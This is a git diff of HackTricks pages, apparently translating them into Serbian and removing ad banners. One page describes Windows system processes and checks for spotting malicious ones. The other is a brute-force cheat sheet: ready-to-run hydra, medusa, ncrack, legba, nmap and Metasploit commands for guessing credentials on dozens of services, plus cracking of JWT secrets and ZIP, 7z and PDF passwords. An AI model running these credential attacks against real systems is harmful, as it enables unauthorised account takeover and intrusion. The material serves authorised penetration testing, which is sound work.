@@ -2,105 +2,105 @@ ## smss.exe -**Session Manager**.\ -Session 0 starts **csrss.exe** and **wininit.exe** (**OS** **services**) while Session 1 starts **csrss.exe** and **winlogon.exe** (**User** **session**). However, you should see **only one process** of that **binary** without children in the processes tree. +**Menadžer sesije**.\ +Sesija 0 pokreće **csrss.exe** i **wininit.exe** (**OS** **usluge**) dok Sesija 1 pokreće **csrss.exe** i **winlogon.exe** (**Korisnička** **sesija**). Međutim, trebali biste videti **samo jedan proces** tog **binarija** bez dece u stablu procesa. -Also, sessions apart from 0 and 1 may mean that RDP sessions are occurring. +Takođe, sesije osim 0 i 1 mogu značiti da se odvijaju RDP sesije. ## csrss.exe -**Client/Server Run Subsystem Process**.\ -It manages **processes** and **threads**, makes the **Windows** **API** available for other processes and also **maps drive letters**, create **temp files**, and handles the **shutdown** **process**. +**Klijent/Server Run Subsystem Process**.\ +Upravlja **procesima** i **nitima**, omogućava **Windows** **API** za druge procese i takođe **mapira slova drajvova**, kreira **temp fajlove** i upravlja **procesom gašenja**. -There is one **running in Session 0 and another one in Session 1** (so **2 processes** in the processes tree). Another one is created **per new Session**. +Postoji jedan **koji se izvršava u Sesiji 0 i još jedan u Sesiji 1** (tako da **2 procesa** u stablu procesa). Još jedan se kreira **po novoj Sesiji**. ## winlogon.exe **Windows Logon Process**.\ -It's responsible for user **logon**/**logoffs**. It launches **logonui.exe** to ask for username and password and then calls **lsass.exe** to verify them. +Odgovoran je za korisnički **prijavu**/**odjavu**. Pokreće **logonui.exe** da zatraži korisničko ime i lozinku, a zatim poziva **lsass.exe** da ih verifikuje. 
-Then it launches **userinit.exe** which is specified in **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** with key **Userinit**. +Zatim pokreće **userinit.exe** koji je naveden u **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** sa ključem **Userinit**. -Mover over, the previous registry should have **explorer.exe** in the **Shell key** or it might be abused as a **malware persistence method**. +Pored toga, prethodni registar bi trebao imati **explorer.exe** u **Shell ključu** ili bi mogao biti zloupotrebljen kao **metoda postojanosti malvera**. ## wininit.exe **Windows Initialization Process**. \ -It launches **services.exe**, **lsass.exe**, and **lsm.exe** in Session 0. There should only be 1 process. +Pokreće **services.exe**, **lsass.exe**, i **lsm.exe** u Sesiji 0. Trebalo bi da postoji samo 1 proces. ## userinit.exe **Userinit Logon Application**.\ -Loads the **ntduser.dat in HKCU** and initialises the **user** **environment** and runs **logon** **scripts** and **GPO**. +Učitava **ntduser.dat u HKCU** i inicijalizuje **korisničko** **okruženje** i pokreće **logon** **skripte** i **GPO**. -It launches **explorer.exe**. +Pokreće **explorer.exe**. ## lsm.exe -**Local Session Manager**.\ -It works with smss.exe to manipulate user sessions: Logon/logoff, shell start, lock/unlock desktop, etc. +**Menadžer lokalnih sesija**.\ +Radi sa smss.exe da manipuliše korisničkim sesijama: Prijava/odjava, pokretanje shell-a, zaključavanje/otključavanje radne površine, itd. -After W7 lsm.exe was transformed into a service (lsm.dll). +Nakon W7, lsm.exe je transformisan u uslugu (lsm.dll). -There should only be 1 process in W7 and from them a service running the DLL. +Trebalo bi da postoji samo 1 proces u W7 i od njih usluga koja pokreće DLL. ## services.exe -**Service Control Manager**.\ -It **loads** **services** configured as **auto-start** and **drivers**. 
+**Menadžer kontrole usluga**.\ +**Učitava** **usluge** konfigurirane kao **automatski start** i **drajvere**. -It's the parent process of **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** and many more. +To je roditeljski proces **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** i mnoge druge. -Services are defined in `HKLM\SYSTEM\CurrentControlSet\Services` and this process maintains a DB in memory of service info that can be queried by sc.exe. +Usluge su definisane u `HKLM\SYSTEM\CurrentControlSet\Services` i ovaj proces održava bazu podataka u memoriji o informacijama o uslugama koje se mogu upititi putem sc.exe. -Note how **some** **services** are going to be running in a **process of their own** and others are going to be **sharing a svchost.exe process**. +Obratite pažnju kako će **neke** **usluge** raditi u **svojim procesima**, dok će druge **deliti svchost.exe proces**. -There should only be 1 process. +Trebalo bi da postoji samo 1 proces. ## lsass.exe -**Local Security Authority Subsystem**.\ -It's responsible for the user **authentication** and create the **security** **tokens**. It uses authentication packages located in `HKLM\System\CurrentControlSet\Control\Lsa`. +**Podsystem lokalne bezbednosti**.\ +Odgovoran je za **autentifikaciju** korisnika i kreira **bezbednosne** **tokene**. Koristi pakete autentifikacije smeštene u `HKLM\System\CurrentControlSet\Control\Lsa`. -It writes to the **Security** **event** **log** and there should only be 1 process. +Piše u **log** **događaja** **bezbednosti** i trebalo bi da postoji samo 1 proces. -Keep in mind that this process is highly attacked to dump passwords. +Imajte na umu da je ovaj proces često napadnut da bi se iskopirali lozinke. ## svchost.exe -**Generic Service Host Process**.\ -It hosts multiple DLL services in one shared process. +**Generički proces hosta usluga**.\ +Hostuje više DLL usluga u jednom deljenom procesu. 
-Usually, you will find that **svchost.exe** is launched with the `-k` flag. This will launch a query to the registry **HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** where there will be a key with the argument mentioned in -k that will contain the services to launch in the same process. +Obično ćete naći da je **svchost.exe** pokrenut sa `-k` oznakom. Ovo će pokrenuti upit u registru **HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** gde će biti ključ sa argumentom pomenutim u -k koji će sadržati usluge koje treba pokrenuti u istom procesu. -For example: `-k UnistackSvcGroup` will launch: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc` +Na primer: `-k UnistackSvcGroup` će pokrenuti: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc` -If the **flag `-s`** is also used with an argument, then svchost is asked to **only launch the specified service** in this argument. +Ako se **oznaka `-s`** takođe koristi sa argumentom, tada se svchost traži da **pokrene samo određenu uslugu** u ovom argumentu. -There will be several processes of `svchost.exe`. If any of them is **not using the `-k` flag**, then that's very suspicious. If you find that **services.exe is not the parent**, that's also very suspicious. +Biće nekoliko procesa `svchost.exe`. Ako nijedan od njih **ne koristi `-k` oznaku**, to je veoma sumnjivo. Ako otkrijete da **services.exe nije roditelj**, to je takođe veoma sumnjivo. ## taskhost.exe -This process act as a host for processes running from DLLs. It also loads the services that are running from DLLs. +Ovaj proces deluje kao host za procese koji se izvršavaju iz DLL-ova. Takođe učitava usluge koje se izvršavaju iz DLL-ova. -In W8 this is called taskhostex.exe and in W10 taskhostw.exe. +U W8 ovo se zove taskhostex.exe, a u W10 taskhostw.exe. 
## explorer.exe -This is the process responsible for the **user's desktop** and launching files via file extensions. +Ovo je proces odgovoran za **radnu površinu korisnika** i pokretanje fajlova putem ekstenzija fajlova. -**Only 1** process should be spawned **per logged on user.** +**Samo 1** proces bi trebao biti pokrenut **po prijavljenom korisniku.** -This is run from **userinit.exe** which should be terminated, so **no parent** should appear for this process. +Ovo se pokreće iz **userinit.exe** koji bi trebao biti prekinut, tako da **nema roditelja** za ovaj proces. -# Catching Malicious Processes +# Hvatanje zlonamernih procesa -- Is it running from the expected path? (No Windows binaries run from temp location) -- Is it communicating with weird IPs? -- Check digital signatures (Microsoft artifacts should be signed) -- Is it spelled correctly? -- Is running under the expected SID? -- Is the parent process the expected one (if any)? -- Are the children processes the expecting ones? (no cmd.exe, wscript.exe, powershell.exe..?) +- Da li se pokreće iz očekivane putanje? (Nijedna Windows binarna datoteka se ne pokreće iz temp lokacije) +- Da li komunicira sa čudnim IP-ovima? +- Proverite digitalne potpise (Microsoft artefakti bi trebali biti potpisani) +- Da li je pravilno napisano? +- Da li se izvršava pod očekivanim SID-om? +- Da li je roditeljski proces očekivani (ako postoji)? +- Da li su procesi dece oni koje očekujete? (nema cmd.exe, wscript.exe, powershell.exe..?) {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/generic-hacking/brute-force.md b/src/generic-hacking/brute-force.md index 9b2faa122..54b636ba1 100644 --- a/src/generic-hacking/brute-force.md +++ b/src/generic-hacking/brute-force.md @@ -1,18 +1,10 @@ # Brute Force - CheatSheet -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %} - {{#include ../banners/hacktricks-training.md}} ## Default Credentials -**Search in google** for default credentials of the technology that is being used, or **try these links**: +**Pretražite na google-u** za podrazumevane akreditive tehnologije koja se koristi, ili **probajte ove linkove**: - [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet) - [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html) @@ -27,12 +19,11 @@ Get Access Today: - [**https://many-passwords.github.io/**](https://many-passwords.github.io) - [**https://theinfocentric.com/**](https://theinfocentric.com/) -## **Create your own Dictionaries** +## **Kreirajte svoje rečnike** -Find as much information about the target as you can and generate a custom dictionary. Tools that may help: +Pronađite što više informacija o meti što možete i generišite prilagođeni rečnik. Alati koji mogu pomoći: ### Crunch - ```bash crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst) 
@@ -43,36 +34,30 @@ crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using chars ^ Special characters including spac crunch 6 8 -t ,@@^^%% ``` - ### Cewl - ```bash cewl example.com -m 5 -w words.txt ``` - ### [CUPP](https://github.com/Mebus/cupp) -Generate passwords based on your knowledge of the victim (names, dates...) - +Generišite lozinke na osnovu vašeg znanja o žrtvi (imena, datumi...) ``` python3 cupp.py -h ``` - ### [Wister](https://github.com/cycurity/wister) -A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regarding a specific target. - +Alat za generisanje rečnika, koji vam omogućava da navedete skup reči, dajući vam mogućnost da kreirate više varijacija od datih reči, stvarajući jedinstven i idealan rečnik za korišćenje u vezi sa specifičnim ciljem. ```bash python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst - __ _______ _____ _______ ______ _____ - \ \ / /_ _|/ ____|__ __| ____| __ \ - \ \ /\ / / | | | (___ | | | |__ | |__) | - \ \/ \/ / | | \___ \ | | | __| | _ / - \ /\ / _| |_ ____) | | | | |____| | \ \ - \/ \/ |_____|_____/ |_| |______|_| \_\ +__ _______ _____ _______ ______ _____ +\ \ / /_ _|/ ____|__ __| ____| __ \ +\ \ /\ / / | | | (___ | | | |__ | |__) | +\ \/ \/ / | | \___ \ | | | __| | _ / +\ /\ / _| |_ ____) | | | | |____| | \ \ +\/ \/ |_____|_____/ |_| |______|_| \_\ - Version 1.0.3 Cycurity +Version 1.0.3 Cycurity Generating wordlist... [########################################] 100% @@ -80,10 +65,9 @@ Generated 67885 lines. Finished in 0.920s. ``` - ### [pydictor](https://github.com/LandGrey/pydictor) -### Wordlists +### Liste reči - [**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists) - [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium) 
@@ -96,20 +80,11 @@ Finished in 0.920s. - [**https://hashkiller.io/listmanager**](https://hashkiller.io/listmanager) - [**https://github.com/Karanxa/Bug-Bounty-Wordlists**](https://github.com/Karanxa/Bug-Bounty-Wordlists) -
+## Usluge -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %} - -## Services - -Ordered alphabetically by service name. +Poređano abecedno po imenu usluge. ### AFP - ```bash nmap -p 548 --script afp-brute msf> use auxiliary/scanner/afp/afp_login 
@@ -119,114 +94,84 @@ msf> set PASS_FILE msf> set USER_FILE msf> run ``` - ### AJP - ```bash nmap --script ajp-brute -p 8009 ``` - -## AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace) - +## AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM i Solace) ```bash legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl] ``` - -### Cassandra - +### Касандра ```bash nmap --script cassandra-brute -p 9160 # legba ScyllaDB / Apache Casandra legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042 ``` - ### CouchDB - ```bash msf> use auxiliary/scanner/couchdb/couchdb_login hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get / ``` - ### Docker Registry - ``` hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/ ``` - ### Elasticsearch - ``` hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get / ``` - ### FTP - ```bash hydra -l root -P passwords.txt [-t 32] ftp ncrack -p 21 --user root -P passwords.txt [-T 5] medusa -u root -P 500-worst-passwords.txt -h -M ftp legba ftp --username admin --password wordlists/passwords.txt --target localhost:21 ``` - -### HTTP Generic Brute +### HTTP Generički Brute #### [**WFuzz**](../pentesting-web/web-tool-wfuzz.md) -### HTTP Basic Auth - +### HTTP Osnovna Autentifikacija ```bash hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/ # Use https-get mode for https medusa -h -u -P -M http -m DIR:/path/to/auth -T 10 legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/ ``` - ### HTTP - NTLM - ```bash legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/ 
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/ ``` - -### HTTP - Post Form - +### HTTP - Post Forma ```bash hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V # Use https-post-form mode for https ``` +Za http**s** morate promeniti "http-post-form" u "**https-post-form"** -For http**s** you have to change from "http-post-form" to "**https-post-form"** - -### **HTTP - CMS --** (W)ordpress, (J)oomla or (D)rupal or (M)oodle - +### **HTTP - CMS --** (W)ordpress, (J)oomla ili (D)rupal ili (M)oodle ```bash cmsmap -f W/J/D/M -u a -p a https://wordpress.com # Check also https://github.com/evilsocket/legba/wiki/HTTP ``` - ### IMAP - ```bash hydra -l USERNAME -P /path/to/passwords.txt -f imap -V hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f imap -V nmap -sV --script imap-brute -p legba imap --username user --password data/passwords.txt --target localhost:993 ``` - ### IRC - ```bash nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p ``` - ### ISCSI - ```bash nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 ``` - ### JWT - ```bash #hashcat hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt 
@@ -249,33 +194,25 @@ python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1w #https://github.com/lmammino/jwt-cracker jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6 ``` - ### LDAP - ```bash nmap --script ldap-brute -p 389 legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match ``` - ### MQTT - ``` ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt ``` - ### Mongo - ```bash nmap -sV --script mongodb-brute -n -p 27017 use auxiliary/scanner/mongodb/mongodb_login legba mongodb --target localhost:27017 --username root --password data/passwords.txt ``` - ### MSSQL [MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) - ```shell # Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt @@ -296,9 +233,7 @@ mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt ```bash legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433 ``` - ### MySQL - ```bash # hydra hydra -L usernames.txt -P pass.txt mysql @@ -312,9 +247,7 @@ medusa -h -u -P <-f | to stop medusa on fir #Legba legba mysql --username root --password wordlists/passwords.txt --target localhost:3306 ``` - ### OracleSQL - ```bash patator oracle_login sid= host= user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017 
@@ -338,21 +271,15 @@ nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid= legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt ``` - -In order to use **oracle_login** with **patator** you need to **install**: - +Da biste koristili **oracle_login** sa **patator** potrebno je da **instalirate**: ```bash pip3 install cx_Oracle --upgrade ``` - -[Offline OracleSQL hash bruteforce](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) (**versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** and **11.2.0.3**): - +[Offline OracleSQL hash bruteforce](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) (**verzije 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** i **11.2.0.3**): ```bash - nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30 +nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30 ``` - ### POP - ```bash hydra -l USERNAME -P /path/to/passwords.txt -f pop3 -V hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f pop3 -V @@ -363,9 +290,7 @@ legba pop3 --username admin@example.com --password wordlists/passwords.txt --tar # SSL legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl ``` - ### PostgreSQL - ```bash hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt postgres medusa -h –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres 
@@ -375,109 +300,81 @@ use auxiliary/scanner/postgres/postgres_login nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432 ``` - ### PPTP -You can download the `.deb` package to install from [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/) - +Možete preuzeti `.deb` paket za instalaciju sa [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/) ```bash sudo dpkg -i thc-pptp-bruter*.deb #Install the package cat rockyou.txt | thc-pptp-bruter –u ``` - ### RDP - ```bash ncrack -vv --user -P pwds.txt rdp:// hydra -V -f -L -P rdp:// legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain ] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon] ``` - ### Redis - ```bash msf> use auxiliary/scanner/redis/redis_login nmap --script redis-brute -p 6379 hydra –P /path/pass.txt redis://: # 6379 is the default legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl] ``` - ### Rexec - ```bash hydra -l -P rexec:// -v -V ``` - ### Rlogin - ```bash hydra -l -P rlogin:// -v -V ``` - ### Rsh - ```bash hydra -L rsh:// -v -V ``` - [http://pentestmonkey.net/tools/misc/rsh-grind](http://pentestmonkey.net/tools/misc/rsh-grind) ### Rsync - ```bash nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 ``` - ### RTSP - ```bash hydra -l root -P passwords.txt rtsp ``` - ### SFTP - ```bash legba sftp --username admin --password wordlists/passwords.txt --target localhost:22 # Try keys from a folder legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22 ``` - ### SNMP - ```bash msf> use auxiliary/scanner/snmp/snmp_login nmap -sU --script snmp-brute [--script-args snmp-brute.communitiesdb= ] 
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp ``` - ### SMB - ```bash nmap --script smb-brute -p 445 hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1 legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup ] [--smb-share ] ``` - ### SMTP - ```bash hydra -l -P /path/to/passwords.txt smtp -V hydra -l -P /path/to/passwords.txt -s 587 -S -v -V #Port 587 for SMTP with SSL legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism ] ``` - ### SOCKS - ```bash nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 legba socks5 --target localhost:1080 --username admin --password data/passwords.txt # With alternative address legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080 ``` - ### SQL Server - ```bash #Use the NetBIOS name of the machine as domain crackmapexec mssql -d -u usernames.txt -p passwords.txt @@ -486,9 +383,7 @@ medusa -h –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssq nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT ``` - ### SSH - ```bash hydra -l root -P passwords.txt [-t 32] ssh ncrack -p 22 --user root -P passwords.txt [-T 5] 
@@ -498,38 +393,32 @@ legba ssh --username admin --password wordlists/passwords.txt --target localhost # Try keys from a folder legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22 ``` +#### Slabi SSH ključevi / Predvidljiv PRNG na Debijanu -#### Weak SSH keys / Debian predictable PRNG +Neki sistemi imaju poznate greške u nasumičnom semenu koje se koristi za generisanje kriptografskog materijala. To može rezultirati dramatično smanjenim prostorom ključeva koji se može bruteforcovati alatima kao što su [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute). Takođe su dostupni unapred generisani setovi slabih ključeva kao što su [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh). -Some systems have known flaws in the random seed used to generate cryptographic material. This can result in a dramatically reduced keyspace which can be bruteforced with tools such as [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute). Pre-generated sets of weak keys are also available such as [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh). - -### STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ) - -The STOMP text protocol is a widely used messaging protocol that **allows seamless communication and interaction with popular message queueing services** such as RabbitMQ, ActiveMQ, HornetQ, and OpenMQ. It provides a standardized and efficient approach to exchange messages and perform various messaging operations. +### STOMP (ActiveMQ, RabbitMQ, HornetQ i OpenMQ) +STOMP tekstualni protokol je široko korišćen protokol za razmenu poruka koji **omogućava besprekornu komunikaciju i interakciju sa popularnim servisima za redove poruka** kao što su RabbitMQ, ActiveMQ, HornetQ i OpenMQ. Pruža standardizovan i efikasan pristup razmeni poruka i izvođenju raznih operacija sa porukama. 
```bash legba stomp --target localhost:61613 --username admin --password data/passwords.txt ``` - ### Telnet - ```bash hydra -l root -P passwords.txt [-t 32] telnet ncrack -p 23 --user root -P passwords.txt [-T 5] medusa -u root -P 500-worst-passwords.txt -h -M telnet legba telnet \ - --username admin \ - --password wordlists/passwords.txt \ - --target localhost:23 \ - --telnet-user-prompt "login: " \ - --telnet-pass-prompt "Password: " \ - --telnet-prompt ":~$ " \ - --single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin +--username admin \ +--password wordlists/passwords.txt \ +--target localhost:23 \ +--telnet-user-prompt "login: " \ +--telnet-pass-prompt "Password: " \ +--telnet-prompt ":~$ " \ +--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin ``` - ### VNC - ```bash hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s vnc medusa -h –u root -P /root/Desktop/pass.txt –M vnc @@ -544,41 +433,29 @@ use auxiliary/scanner/vnc/vnc_login set RHOSTS set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst ``` - ### Winrm - ```bash crackmapexec winrm -d -u usernames.txt -p passwords.txt ``` +## Lokalno -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %} - -## Local - -### Online cracking databases +### Online baze podataka za razbijanje - [~~http://hashtoolkit.com/reverse-hash?~~](http://hashtoolkit.com/reverse-hash?) (MD5 & SHA1) -- [https://shuck.sh/get-shucking.php](https://shuck.sh/get-shucking.php) (MSCHAPv2/PPTP-VPN/NetNTLMv1 with/without ESS/SSP and with any challenge's value) -- [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) (Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...) -- [https://crackstation.net/](https://crackstation.net) (Hashes) +- [https://shuck.sh/get-shucking.php](https://shuck.sh/get-shucking.php) (MSCHAPv2/PPTP-VPN/NetNTLMv1 sa/bez ESS/SSP i sa bilo kojom vrednošću izazova) +- [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) (Hashovi, WPA2 snimci i arhive MSOffice, ZIP, PDF...) 
+- [https://crackstation.net/](https://crackstation.net) (Hashovi) - [https://md5decrypt.net/](https://md5decrypt.net) (MD5) -- [https://gpuhash.me/](https://gpuhash.me) (Hashes and file hashes) -- [https://hashes.org/search.php](https://hashes.org/search.php) (Hashes) -- [https://www.cmd5.org/](https://www.cmd5.org) (Hashes) +- [https://gpuhash.me/](https://gpuhash.me) (Hashovi i hashovi fajlova) +- [https://hashes.org/search.php](https://hashes.org/search.php) (Hashovi) +- [https://www.cmd5.org/](https://www.cmd5.org) (Hashovi) - [https://hashkiller.co.uk/Cracker](https://hashkiller.co.uk/Cracker) (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512) - [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) (MD5) - [http://reverse-hash-lookup.online-domain-tools.com/](http://reverse-hash-lookup.online-domain-tools.com) -Check this out before trying to brute force a Hash. +Proverite ovo pre nego što pokušate da brute force-ujete hash. ### ZIP - ```bash #sudo apt-get install fcrackzip fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip 
@@ -594,12 +471,10 @@ john zip.john hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt .\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack ``` +#### Napad sa poznatim otvorenim tekstom zip -#### Known plaintext zip attack - -You need to know the **plaintext** (or part of the plaintext) **of a file contained inside** the encrypted zip. You can check **filenames and size of files contained inside** an encrypted zip running: **`7z l encrypted.zip`**\ -Download [**bkcrack** ](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0)from the releases page. - +Morate znati **otvoreni tekst** (ili deo otvorenog teksta) **fajla koji se nalazi unutar** enkriptovanog zip-a. Možete proveriti **imena fajlova i veličinu fajlova koji se nalaze unutar** enkriptovanog zip-a pokretanjem: **`7z l encrypted.zip`**\ +Preuzmite [**bkcrack** ](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0) sa stranice sa izdanjima. ```bash # You need to create a zip file containing only the file that is inside the encrypted zip zip plaintext.zip plaintext.file @@ -611,9 +486,7 @@ zip plaintext.zip plaintext.file ./bkcrack -C -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd unzip unlocked.zip #User new_pwd as password ``` - ### 7z - ```bash cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z ``` @@ -624,9 +497,7 @@ wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo apt-get install libcompress-raw-lzma-perl ./7z2john.pl file.7z > 7zhash.john ``` - ### PDF - ```bash apt-get install pdfcrack pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt 
